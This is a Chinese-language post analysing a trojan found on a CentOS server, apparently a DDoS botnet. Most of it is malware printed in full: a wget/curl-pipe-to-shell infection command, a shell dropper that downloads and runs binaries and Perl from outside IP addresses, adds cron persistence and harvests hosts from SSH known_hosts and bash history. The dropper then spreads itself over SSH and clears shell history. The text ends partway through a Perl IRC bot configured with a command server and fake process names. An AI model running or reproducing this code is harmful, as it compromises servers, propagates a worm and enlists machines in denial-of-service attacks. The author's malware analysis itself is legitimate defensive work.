最近一段时间,所使用的CentOS服务器被不明人士安放了木马程序;观察发现该木马程序是用来发起DDOS攻击的肉鸡程序,在发作时占用绝大部分的网络带宽。
起点:
wget http://65.254.63.20/a|sh ; curl -O http://65.254.63.20/a ; sh a;rm -rf a*
执行完上面的代码以后,你的机器就已经中招了。以下是所下载和执行的代码:
plm=`ps x |grep httpd.conf|grep -v grep`
plt=`cat /proc/cpuinfo|grep aes`
#pgrep perl |sed '1d;' |xargs kill -9
if [ "$plm" != "" ]
then
echo
else
rm -rf apache* httpd.conf* /usr/local/bin/sysmonitord
echo 'nameserver 8.8.8.8'> /etc/resolv.conf
#/sbin/iptables -A OUTPUT -p tcp --dport 45560 -j ACCEPT
kill -9 `ps x|grep stratum|awk '{print $1}'`
kill -9 `ps x|grep httpd.conf|grep -v grep|awk '{print $1}'`
#killall -9 sysmonitord sh wget curl
crontab -r
if [ -f libcurl.so.4 ] ; then
echo
else
wget 223.255.145.158/libcrypto.so.6 > /dev/null 2>&1
wget 223.255.145.158/libcurl.so.4 > /dev/null 2>&1
wget 223.255.145.158/libssl.so.6 > /dev/null 2>&1
wget 223.255.145.158/libldap-2.3.so.0 > /dev/null 2>&1
wget 223.255.145.158/liblber-2.3.so.0 > /dev/null 2>&1
curl -O http://223.255.145.158/libcrypto.so.6 > /dev/null 2>&1
curl -O http://223.255.145.158/libssl.so.6 > /dev/null 2>&1
curl -O http://223.255.145.158/libcurl.so.4 > /dev/null 2>&1
curl -O http://223.255.145.158/libldap-2.3.so.0 > /dev/null 2>&1
curl -O http://223.255.145.158/liblber-2.3.so.0 > /dev/null 2>&1
export LD_LIBRARY_PATH=`pwd`
fi
curl -O http://65.254.63.20/apache > /dev/null 2>&1
wget -qO - http://65.254.63.20/.mail | perl
curl -O http://65.254.63.20/.mail > /dev/null 2>&1
fetch http://65.254.63.20/.mail > /dev/null 2>&1 ; perl .mail ; rm -rf .mail*
wget http://65.254.63.20/apache > /dev/null 2>&1
wget http://65.254.63.20/httpd.conf > /dev/null 2>&1
curl -O http://65.254.63.20/httpd.conf > /dev/null 2>&1
if [ -f /etc/cron.daily/anacron ] ; then
echo
else
wget -O /etc/cron.daily/anacron http://65.254.63.20/a > /dev/null 2>&1 ; chmod +x /etc/cron.daily/anacron
curl -O http://65.254.63.20/a > /dev/null 2>&1; mv a /etc/cron.daily/anacron ; chmod +x /etc/cron.daily/anacron
fi
chmod +x apache
(exec ./apache -c httpd.conf &> /dev/null &)
sleep 2
rm -rf wget* apache* httpd*
fi
if [ "$plm" != "" ]
then
echo
else
if [ "$plt" != "" ]
then
echo
else
wget http://65.254.63.20/apacheaes > /dev/null 2>&1
curl -O http://65.254.63.20/apacheaes > /dev/null 2>&1
wget http://65.254.63.20/httpd.conf > /dev/null 2>&1
curl -O http://65.254.63.20/httpd.conf > /dev/null 2>&1
chmod +x apacheaes
mv apacheaes apache2
(exec ./apache2 -c httpd.conf &> /dev/null &)
fi
fi
if [ -f /tmp/.h ] ; then
echo
else
cat /root/.ssh/known_hosts|grep -v ,|awk '{print $1}' > /tmp/.h > /dev/null 2>&1
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h > /dev/null 2>&1
cat /root/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h > /dev/null 2>&1
cat /home/*/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h > /dev/null 2>&1
cat /home/*/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h > /dev/null 2>&1
cat /home/*/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h > /dev/null 2>&1
cat /root/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h > /dev/null 2>&1
cat /root/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h > /dev/null 2>&1
for i in `cat /tmp/.h` ; do (exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no `whoami`@$i "wget http://65.254.63.20/a|sh ; curl -O http://65.254.63.20/a ; sh a;rm -rf a*") > /dev/null 2>&1 ; done
fi
history -rc
以上shell脚本代码主要是下载并执行相关代码,以启动相应功能的服务进程;然后分析相应的日志/历史文件,从中解析出相关IP地址,并尝试登录到相应IP地址并再次执行上述动作(即:下载并执行上述shell脚本,以达到感染其他机器的目的)。
上面的 wget http://65.254.63.20/.mail | perl 所下载并执行的perl代码:
#!/usr/bin/perl
my @mast3rs = ("G");
my @hostauth = ("localhost");
my @admchan=("#x");
my @server = ("213.152.3.19");
$servidor= $server[rand scalar @server] unless $servidor;
my $xeqt = "!say";
my $homedir = "/tmp";
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;
my @fakeps = ("/usr/bin/httpd");
my @nickname = ("V");
my @xident = ("xxx");
my @xname = (`uname -a`);
#################
# Random Ports
#################
my @rports = ("8080");
my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
"\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
"\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
"\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
"\001Snak for Macintosh 4.9.8 English\001",
"\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
"\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
"\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
"\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
"\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
"\001ircN 8.00 ^_-^_ he tries to tell me what I put inside of me ^_-^_\001",
"\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
"\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
"\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
"\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
"\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
"\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1??9] : Keep it to yourself!\001",
"\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
"\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
"\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10